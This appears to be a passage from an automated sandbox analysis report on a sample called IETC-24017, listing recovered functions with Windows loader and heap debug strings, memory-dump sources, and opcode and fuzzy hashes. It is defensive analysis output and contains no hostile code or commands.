                                                                                                                                                  Function 0042CD43 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 204 42cd43-42cd7c call 404753 call 42dbb3 ExitProcess
                                                                                                                                                  APIs
                                                                                                                                                  • ExitProcess.KERNEL32(?,00000000,00000000,?,277D128D,?,?,277D128D), ref: 0042CD77
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1821676970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_IETC-24017.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExitProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 621844428-0
                                                                                                                                                  • Opcode ID: edee4ac45882e3a391390ced45825802a0c3624571a65e2972039ebaf5ed4a9c
                                                                                                                                                  • Instruction ID: 692c4be71a5eb9632b3056ffe319412920ce8c8203fed8ae657d1f16700ff5ac
                                                                                                                                                  • Opcode Fuzzy Hash: edee4ac45882e3a391390ced45825802a0c3624571a65e2972039ebaf5ed4a9c
                                                                                                                                                  • Instruction Fuzzy Hash: 13E04F356002147BC620EA5ADC41F9B7B5DDFC5754F00405AFA586B241D7B1791087E5
                                                                                                                                                  Function 01842C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 209 1842c0a-1842c0f 210 1842c11-1842c18 209->210 211 1842c1f-1842c26 LdrInitializeThunk 209->211
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 510223f9b684263e23cff47cb3a62f0273c34362a4d0a0e50aaf7bc620a89aec
                                                                                                                                                  • Instruction ID: f63c336f628adabc7766a7891f16d9a29cf4172be41f5933b5ba880c2356e11a
                                                                                                                                                  • Opcode Fuzzy Hash: 510223f9b684263e23cff47cb3a62f0273c34362a4d0a0e50aaf7bc620a89aec
                                                                                                                                                  • Instruction Fuzzy Hash: FAB09B719055C5CADB52E76456087177D01B7D1701F15C062F3034641F4778C2D5E676

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Function 01882349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                  • API String ID: 0-2160512332
                                                                                                                                                  • Opcode ID: 18e644847a58b5706c89d0af11a18b2afdd5ac5e8aaa6f3194466662fc16a83c
                                                                                                                                                  • Instruction ID: 3a9b0cc0427d0df2a14293f6f5d242b8b8a7194cd92d474c90adc91f8f135f08
                                                                                                                                                  • Opcode Fuzzy Hash: 18e644847a58b5706c89d0af11a18b2afdd5ac5e8aaa6f3194466662fc16a83c
                                                                                                                                                  • Instruction Fuzzy Hash: 7E929E71608746AFE721EE18C880F6BBBEABF84714F04491DFA94D7251D770EA44CB92
                                                                                                                                                  Function 01838620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • Critical section debug info address, xrefs: 0187541F, 0187552E
                                                                                                                                                  • undeleted critical section in freed memory, xrefs: 0187542B
                                                                                                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018754CE
                                                                                                                                                  • Critical section address., xrefs: 01875502
                                                                                                                                                  • corrupted critical section, xrefs: 018754C2
                                                                                                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018754E2
                                                                                                                                                  • Address of the debug info found in the active list., xrefs: 018754AE, 018754FA
                                                                                                                                                  • Invalid debug info address of this critical section, xrefs: 018754B6
                                                                                                                                                  • Thread identifier, xrefs: 0187553A
                                                                                                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0187540A, 01875496, 01875519
                                                                                                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 01875543
                                                                                                                                                  • 8, xrefs: 018752E3
                                                                                                                                                  • double initialized or corrupted critical section, xrefs: 01875508
                                                                                                                                                  • Critical section address, xrefs: 01875425, 018754BC, 01875534
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                  • API String ID: 0-2368682639
                                                                                                                                                  • Opcode ID: 15d2795863d36c00180f773a96c4fa5aad9387f44a49c1add55e36465a96a638
                                                                                                                                                  • Instruction ID: 2a64b600bfecb6cb10e453c75b3711a886c9e7cfd89062f14c4d945452d5e545
                                                                                                                                                  • Opcode Fuzzy Hash: 15d2795863d36c00180f773a96c4fa5aad9387f44a49c1add55e36465a96a638
                                                                                                                                                  • Instruction Fuzzy Hash: D5818AB1A00358AFDB20CF99C888BAEBBF5FB49704F244119F504F7290D775AA40CBA1
                                                                                                                                                  Function 018329F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01872602
                                                                                                                                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018722E4
                                                                                                                                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 0187261F
                                                                                                                                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018725EB
                                                                                                                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01872624
                                                                                                                                                  • @, xrefs: 0187259B
                                                                                                                                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01872412
                                                                                                                                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01872409
                                                                                                                                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018724C0
                                                                                                                                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01872506
                                                                                                                                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01872498
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                                  • API String ID: 0-4009184096
                                                                                                                                                  • Opcode ID: 6658687bd448ec4ed070cd630c34b583261879bc04b5175e1e5fe6e92cb34757
                                                                                                                                                  • Instruction ID: 1fcff6de5e3dc45206aea32cd901f1b5a19f023bf95e1bdd9f590786cd41b9fa
                                                                                                                                                  • Opcode Fuzzy Hash: 6658687bd448ec4ed070cd630c34b583261879bc04b5175e1e5fe6e92cb34757
                                                                                                                                                  • Instruction Fuzzy Hash: B5025EF1D002299BDB31DB58CC80B9AB7B9AF54314F0441EAA709E7241EB709F85CF99
                                                                                                                                                  Function 018A8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                  • API String ID: 0-2515994595
                                                                                                                                                  • Opcode ID: 5ddb97e52f3772710528a89382de8eb2abefe6c2ec9b41822bf8508372b97659
                                                                                                                                                  • Instruction ID: 39e838fb673d6d672de22f6b4c706f95462bfa113cfb183e21c77aaef7ec4efc
                                                                                                                                                  • Opcode Fuzzy Hash: 5ddb97e52f3772710528a89382de8eb2abefe6c2ec9b41822bf8508372b97659
                                                                                                                                                  • Instruction Fuzzy Hash: 5351D4715043199BE329DF188844BABBBE8FF95345F94492DEA98C3241E770D704CBE2
                                                                                                                                                  Function 018B0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                  • API String ID: 0-1700792311
                                                                                                                                                  • Opcode ID: 7ef7f6a00d67fe89e056131a48dd82c59f619a4670aa4183f7d243ebee1cf1d0
                                                                                                                                                  • Instruction ID: 859cb674908ac2eef1143725e93dc3c5a07eec04c7b365b4ae0a32049fd2cf57
                                                                                                                                                  • Opcode Fuzzy Hash: 7ef7f6a00d67fe89e056131a48dd82c59f619a4670aa4183f7d243ebee1cf1d0
                                                                                                                                                  • Instruction Fuzzy Hash: 18D1973150068ADFDB26DF68C494AAAFBB1FF4A714F18805DE545DB752C734AA81CB10
                                                                                                                                                  Function 018889B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • AVRF: -*- final list of providers -*- , xrefs: 01888B8F
                                                                                                                                                  • VerifierDebug, xrefs: 01888CA5
                                                                                                                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01888A3D
                                                                                                                                                  • HandleTraces, xrefs: 01888C8F
                                                                                                                                                  • VerifierDlls, xrefs: 01888CBD
                                                                                                                                                  • VerifierFlags, xrefs: 01888C50
                                                                                                                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01888A67
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                  • API String ID: 0-3223716464
                                                                                                                                                  • Opcode ID: 52baa7fbf636d9f1e571b2e1a22acdc8ee63a85da69bd3dc034b89ff6fd6a329
                                                                                                                                                  • Instruction ID: 86d167db8fb8a742154ef48f61797d69bf41cca6811139c61f135857116ca555
                                                                                                                                                  • Opcode Fuzzy Hash: 52baa7fbf636d9f1e571b2e1a22acdc8ee63a85da69bd3dc034b89ff6fd6a329
                                                                                                                                                  • Instruction Fuzzy Hash: 7C912571A41716AFD721FF2C8880F2ABBE5AB95B14F84051CFA45EB285D7309F05CB92
                                                                                                                                                  Function 0180EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                                  • API String ID: 0-1109411897
                                                                                                                                                  • Opcode ID: 32f246818066da27cee826ba8e307de05f091c164f34eea90c284c00c3bb4561
                                                                                                                                                  • Instruction ID: c07c390a3c6dfbf29324c0bca05efaa3398fec3e888a216040f036157caa9eaf
                                                                                                                                                  • Opcode Fuzzy Hash: 32f246818066da27cee826ba8e307de05f091c164f34eea90c284c00c3bb4561
                                                                                                                                                  • Instruction Fuzzy Hash: 30A21874A0562E8BDBA5DF18CD887AEBBB5AF45304F1482D9D909E7291DB319F81CF00
                                                                                                                                                  Function 018363FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                  • API String ID: 0-792281065
                                                                                                                                                  • Opcode ID: 997da582d42541fd5fe7daefee38791df5e6c21fa84a46ffae9a9d1c26542179
                                                                                                                                                  • Instruction ID: 22d797bdd79ad271d2752c5e256f1535f2b1e9727251a7407f52030bd7f64da2
                                                                                                                                                  • Opcode Fuzzy Hash: 997da582d42541fd5fe7daefee38791df5e6c21fa84a46ffae9a9d1c26542179
                                                                                                                                                  • Instruction Fuzzy Hash: 33910A70F01715ABDB25EF5CE884BA97BA5BB51B14F28012CEA10E7281EB74DB41CBD1
                                                                                                                                                  Function 017F645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01859A2A
                                                                                                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 018599ED
                                                                                                                                                  • apphelp.dll, xrefs: 017F6496
                                                                                                                                                  • LdrpInitShimEngine, xrefs: 018599F4, 01859A07, 01859A30
                                                                                                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01859A01
                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01859A11, 01859A3A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                  • API String ID: 0-204845295
                                                                                                                                                  • Opcode ID: 3a26ec920a85d67e0edab3fa2f58c758e4bd28a4188def1d11949dd71d168511
                                                                                                                                                  • Instruction ID: 45abd722557eac7fb01146992cf59eea35ddbec73e6a168bd292d6d2ef480730
                                                                                                                                                  • Opcode Fuzzy Hash: 3a26ec920a85d67e0edab3fa2f58c758e4bd28a4188def1d11949dd71d168511
                                                                                                                                                  • Instruction Fuzzy Hash: 1E519071608305DFE721DB28C855F6BB7E8EB84748F10092DFA85D7265E730EA04CBA2
                                                                                                                                                  Function 0183C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 018781E5
                                                                                                                                                  • LdrpInitializeImportRedirection, xrefs: 01878177, 018781EB
                                                                                                                                                  • LdrpInitializeProcess, xrefs: 0183C6C4
                                                                                                                                                  • Loading import redirection DLL: '%wZ', xrefs: 01878170
                                                                                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01878181, 018781F5
                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0183C6C3
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                  • API String ID: 0-475462383
                                                                                                                                                  • Opcode ID: ab7bdef67fcc2446a21b40c06621977c543f94fe63384422df6d185b123eb3a7
                                                                                                                                                  • Instruction ID: eac7775799f442356901d87fcd6e340a5ed83366a1140dbbe6d523d3a1e04860
                                                                                                                                                  • Opcode Fuzzy Hash: ab7bdef67fcc2446a21b40c06621977c543f94fe63384422df6d185b123eb3a7
                                                                                                                                                  • Instruction Fuzzy Hash: 0931E4B16487469BC224EB2CD949E1AB7E5EF94B14F04056CF941EB291EB60EE04C7A3
                                                                                                                                                  Function 01832674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018721BF
                                                                                                                                                  • RtlGetAssemblyStorageRoot, xrefs: 01872160, 0187219A, 018721BA
                                                                                                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0187219F
                                                                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01872178
                                                                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 01872165
                                                                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01872180
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                  • API String ID: 0-861424205
                                                                                                                                                  • Opcode ID: d741695dd3569e4fa90a579681ae9a34670d743557c2248cea26c83e55b5e217
                                                                                                                                                  • Instruction ID: 0c5558b9b4a636f655bbaec76e29c9edd269b3d80c883b280f07c69135124833
                                                                                                                                                  • Opcode Fuzzy Hash: d741695dd3569e4fa90a579681ae9a34670d743557c2248cea26c83e55b5e217
                                                                                                                                                  • Instruction Fuzzy Hash: 21313776B4021577EB229A999C55F5BBBBAFBA4B94F094059BB04E7200D270EF00C3E1
                                                                                                                                                  Function 0184096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 01842DF0: LdrInitializeThunk.NTDLL ref: 01842DFA
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01840BA3
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01840BB6
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01840D60
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01840D74
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1404860816-0
                                                                                                                                                  • Opcode ID: 32800993097451122569fffc98408aec1d88b75f5c3d6f37f5c097b8e5a27930
                                                                                                                                                  • Instruction ID: 324b1e80f3a4aff40e999eb9bd6048cff68b38e902d3430c91963f6fdbba510a
                                                                                                                                                  • Opcode Fuzzy Hash: 32800993097451122569fffc98408aec1d88b75f5c3d6f37f5c097b8e5a27930
                                                                                                                                                  • Instruction Fuzzy Hash: 9D423A75900719DFDB21CF68C880BAAB7F5BF44314F1445A9EA89DB241EB70EA84CF61
                                                                                                                                                  Function 0180A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                  • API String ID: 0-379654539
                                                                                                                                                  • Opcode ID: 428501119cf1d70973560884d8f8d763e10ca204a32ec4b0b5aa84a96d6f21be
                                                                                                                                                  • Instruction ID: 5ee3b52cc20dc71e0a37f40072e8bfdf7517a10f0d65fc695995a219a736b8c7
                                                                                                                                                  • Opcode Fuzzy Hash: 428501119cf1d70973560884d8f8d763e10ca204a32ec4b0b5aa84a96d6f21be
                                                                                                                                                  • Instruction Fuzzy Hash: 52C19C7410878ACFD75ACF68C880B6AB7E4BF84708F044969F995CB291E735CB49CB52
                                                                                                                                                  Function 01838402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0183855E
                                                                                                                                                  • @, xrefs: 01838591
                                                                                                                                                  • LdrpInitializeProcess, xrefs: 01838422
                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01838421
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                  • API String ID: 0-1918872054
                                                                                                                                                  • Opcode ID: 8a469859718a973caf6af826bb3c017fe29480d6a2f9c8ba78df7a78f59b8693
                                                                                                                                                  • Instruction ID: d00a205faeb3bc943d26b056b88c0bd29ffa811ea2a978f10d0091199867be40
                                                                                                                                                  • Opcode Fuzzy Hash: 8a469859718a973caf6af826bb3c017fe29480d6a2f9c8ba78df7a78f59b8693
                                                                                                                                                  • Instruction Fuzzy Hash: 4E919D71548749AFD722DF25CC80E6BBAE8BB85744F440A2EFA84D2151E734DB448BA3
                                                                                                                                                  Function 0183273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018722B6
                                                                                                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018721D9, 018722B1
                                                                                                                                                  • .Local, xrefs: 018328D8
                                                                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 018721DE
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                  • API String ID: 0-1239276146
